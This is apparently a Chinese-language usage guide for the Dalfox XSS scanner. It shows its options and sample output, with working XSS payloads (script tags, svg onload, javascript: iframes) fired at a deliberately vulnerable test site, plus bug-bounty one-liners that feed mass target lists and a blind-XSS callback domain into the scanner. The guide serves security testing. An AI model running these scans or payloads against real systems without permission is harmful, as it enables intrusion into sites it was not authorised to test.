	"OnlyDiscovery": false

和 Config 映射到 options.model。


dalfox url https://google.com --config config.json 


什么是 BAV

BAV(Basic Another Vulnerability)是对xss扫描中其他漏洞的测试。并且默认值为true。

  • SQL注入
  • SSTI
  • 打开重定向
  • CRLF注入漏洞

禁用 BAV

如果您不想使用BAV扫描,您可以使用以下选项禁用 BAV。

dalfox url https://google.com --skip-bav


[*] ? Start scan [SID:Single] / URL: http://localhost:8070/xss/abcd/2
[G] Found CRLF Injection via built-in grepping / original request
[POC][G][CRLF/GET] http://localhost:8070/xss/abcd/2
[I] Found 0 testing point in DOM base parameter mining
[I] Content-Type is text/html; charset=UTF-8is ?
[I] Reflected PATH '/xss/dalfoxpathtest/2' => Injected: /inJS-single(1)]
[V] Triggered XSS Payload (found dialog in headless)aiting headless
[POC][V][GET] http://localhost:8070/xss/abcd'-confirm(1)-'/2?=



POST https://www.hahwul.com/?q=xspear HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Connection: keep-alive
Cookie: _ga=GA1.2.1102548207.1555467144; _gid=GA1.2.1362788908.1563875038
Upgrade-Insecure-Requests: 1
Host: www.hahwul.com



dalfox file --rawdata ./samples/sample_rawdata.txt


[*] Using file mode(rawdata)
[*] Target URL: https://www.hahwul.com/?q=xspear
[*] Vaild target [ code:405 / size:131 ]
[*] Using dictionary mining option [list=GF-Patterns] ?⛏
[*] Using DOM mining option ?⛏
[*] Start BAV(Basic Another Vulnerability) analysis / [sqli, ssti, OpenRedirect]  ?
[*] Start parameter analysis.. ?
[*] Start static analysis.. ?
[I] Found 0 testing point in DOM Mining
[*] Static analysis done ✓
[*] BAV analysis done ✓
[*] Parameter analysis  done ✓
[*] Generate XSS payload and optimization.Optimization.. ?
[*] Start XSS Scanning.. with 33 queries ?
[*] Finish :D



(默认)Gf-Patterns 和 DOM 挖掘

Dalfox 扫描时默认进行参数挖掘。这是基于Gf-patterns XSS 参数和自定义/远程单词列表是否可用取决于标志的使用。另外还有一个通过DOM分析的Mining功能,也是默认的挖掘。


dalfox url https://example.com --mining-dict-word=./params.txt

使用远程 字典列表

dalfox url https://example.com --remote-wordlists=burp,assetnote
  • burp : 在 BurpSuite 中使用 Param Miner 的词表
  • assetnote : 使用 Assetnote 词表


禁用 DOM 挖掘
dalfox url https://example.com --remote-wordlists=burp,assetnote
dalfox url https://example.com --skip-mining-dict
dalfox url https://example.com --skip-mining-all


自定义 payload

dalfox url --custom-payload payload-list.txt


  • --custom-alert-value=例如(XSS1document.location
  • --custom-alert-type= 例如 ( strnone)

无或空:只写警报值(例如 –custom-alert-value=130 / –custom-alert-value=location.href) str: "PAYLOAD"/'PAYLOAD'



▶ dalfox url http://testphp.vulnweb.com/listproducts.php\?artist\=123
[V] Triggered XSS Payload (found DOM Object): cat=</ScriPt><sCripT class=dalfox>alert(1)</sCriPt>
    48 line:  yntax to use near '=</ScriPt><sCripT class=dalfox>alert(1)</sCriPt>' at line 1
[POC][V][GET] http://testphp.vulnweb.com/listproducts.php?artist=123&cat=%3C%2FScriPt%3E%3CsCripT+class%3Ddalfox%3Ealert%281%29%3C%2FsCriPt%3E

使用的选项 – only value

▶ dalfox url http://testphp.vulnweb.com/listproducts.php\?artist\=123 --custom-alert-value 1337
[V] Triggered XSS Payload (found DOM Object): cat='><sVg/onload=alert(1337) class=dalfox>
    48 line:  syntax to use near ''><sVg/onload=alert(1337) class=dalfox>' at line 1
[POC][V][GET] http://testphp.vulnweb.com/listproducts.php?artist=123&cat=%27%3E%3CsVg%2Fonload%3Dalert%281337%29+class%3Ddalfox%3E

使用的选项 – type=str

▶ dalfox url http://testphp.vulnweb.com/listproducts.php\?artist\=123 --custom-alert-value 1337 --custom-alert-type str
[V] Triggered XSS Payload (found DOM Object): cat=<svG/onload=confirm("1337") class=dalfox>
    48 line:  yntax to use near '=<svG/onload=confirm("1337") class=dalfox>' at line 1
[POC][V][GET] http://testphp.vulnweb.com/listproducts.php?artist=123&cat=%3CsvG%2Fonload%3Dconfirm%28%221337%22%29+class%3Ddalfox%3E

使用的选项 – type=none,str

▶ dalfox url http://testphp.vulnweb.com/listproducts.php\?artist\=123 --custom-alert-value 1337 --custom-alert-type str,int
[V] Triggered XSS Payload (found DOM Object): cat="><iFrAme/src=jaVascRipt:alert('1337') class=dalfox></iFramE>
    48 line:  syntax to use near '"><iFrAme/src=jaVascRipt:alert('1337') class=dalfox></iFramE
[POC][V][GET] http://testphp.vulnweb.com/listproducts.php?artist=123&cat=%22%3E%3CiFrAme%2Fsrc%3DjaVascRipt%3Aalert%28%271337%27%29+class%3Ddalfox%3E%3C%2FiFramE%3E




dalfox url https://example.com --remote-payloads portswigger


dalfox url https://example.com --remote-payloads portswigger,payloadbox
dalfox 基于golang的参数分析型XSS漏洞扫描工具



dalfox 基于golang的参数分析型XSS漏洞扫描工具



在 awesome-oneliner-bugbounty 中从主机/ @cihanmehmet扫描 XSS

gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txt

使用 Dalfox、GF 和 Waybackurls 自动化 XSS

cat test.txt | gf xss | sed ‘s/=.*/=/’ | sed ‘s/URL: //’ | tee testxss.txt ; dalfox file testxss.txt -b yours-xss-hunter-domain(e.g yours.xss.ht)

查找 XSS 和 Blind XSS,并将每个请求发送到 burpsuite 进行更多的手动测试

dalfox file hosts --mining-dom  --deep-domxss --ignore-return -b 'YOURS.xss.ht' --follow-redirects --proxy

dalfox 扫描到漏洞赏金目标/来自 KingOfBugBountyTips

wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @

侦察子域和 gau 以搜索 vuls DalFox / 来自 KingOfBugBountyTips

assetfinder testphp.vulnweb.com | gau |  dalfox pipe



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